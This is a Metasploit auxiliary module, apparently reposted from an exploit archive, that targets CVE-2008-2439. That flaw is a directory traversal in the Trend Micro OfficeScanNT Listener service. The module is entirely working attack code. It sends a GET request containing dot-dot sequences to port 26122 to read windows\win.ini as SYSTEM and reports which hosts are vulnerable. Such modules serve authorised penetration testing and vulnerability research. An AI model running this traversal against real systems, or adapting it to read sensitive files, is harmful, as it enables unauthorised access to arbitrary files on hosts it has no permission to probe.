Share
## https://sploitus.com/exploit?id=PACKETSTORM:180805
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpClient  
include Msf::Auxiliary::Scanner  
  
def initialize  
super(  
'Name' => 'TrendMicro OfficeScanNT Listener Traversal Arbitrary File Access',  
'Description' => %q{  
This module tests for directory traversal vulnerability in the UpdateAgent  
function in the OfficeScanNT Listener (TmListen.exe) service in Trend Micro  
OfficeScan. This allows remote attackers to read arbitrary files as SYSTEM  
via dot dot sequences in an HTTP request.  
},  
'References' =>  
[  
[ 'OSVDB', '48730' ],  
[ 'CVE', '2008-2439' ],  
[ 'BID', '31531' ],  
[ 'URL', 'http://www.trendmicro.com/ftp/documentation/readme/OSCE_7.3_Win_EN_CriticalPatch_B1372_Readme.txt' ],  
],  
'Author' => [ 'Anshul Pandey <anshul999[at]gmail.com>', 'aushack' ],  
'License' => MSF_LICENSE  
)  
  
register_options(  
[  
Opt::RPORT(26122),  
])  
end  
  
def run_host(target_host)  
  
res = send_request_raw(  
{  
'uri' => '/activeupdate/../../../../../../../../../../../windows\\win.ini',  
'method' => 'GET',  
}, 20)  
  
if not res  
print_error("No response from server")  
return  
end  
  
http_fingerprint({ :response => res })  
  
if (res.code >= 200)  
if (res.body =~ /for 16-bit app support/)  
vuln = "vulnerable."  
else  
vuln = "not vulnerable."  
end  
if (res.headers['Server'])  
print_status("http://#{target_host}:#{rport} is running #{res.headers['Server']} and is #{vuln}")  
end  
end  
end  
end